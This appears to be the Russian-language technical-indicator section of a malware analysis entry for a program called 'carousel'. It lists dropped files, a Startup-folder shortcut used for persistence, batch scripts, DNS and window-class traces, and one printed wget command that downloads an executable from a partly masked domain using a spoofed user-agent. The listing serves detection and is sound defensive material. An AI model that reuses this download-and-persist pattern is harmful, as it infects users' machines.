Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\carousel.lnk
- %TEMP%\dump\carousel_v.1.2.exe
- %PROGRAM_FILES%\carousel\wget.exe --user-agent="Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50" -P "%TEMP%\dump" "http://ag##.com.ua/carousel/carousel_v.1.2.exe"
- %PROGRAM_FILES%\carousel\carousel.exe
- %TEMP%\dump\carousel_v.1.2.exe (загружен из сети Интернет)
- %PROGRAM_FILES%\carousel\carousel.exe
- %PROGRAM_FILES%\carousel\changelog.txt
- %TEMP%\dump\carousel_v.1.2.exe
- %TEMP%\2491.bat
- %PROGRAM_FILES%\carousel\proxy.bat
- %PROGRAM_FILES%\carousel\carousel.bat
- %PROGRAM_FILES%\carousel\wget.exe
- %PROGRAM_FILES%\carousel\sleep.exe
- %TEMP%\2491.bat
- %PROGRAM_FILES%\carousel\sleep.exe
- %PROGRAM_FILES%\carousel\wget.exe
- %TEMP%\2491.bat
- %PROGRAM_FILES%\carousel\proxy.bat
- %PROGRAM_FILES%\carousel\carousel.bat
- %PROGRAM_FILES%\carousel\carousel.exe
- %PROGRAM_FILES%\carousel\changelog.txt
- 'ag##.com.ua':80
- ag##.com.ua/carousel/carousel_v.1.2.exe
- DNS ASK ag##.com.ua
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''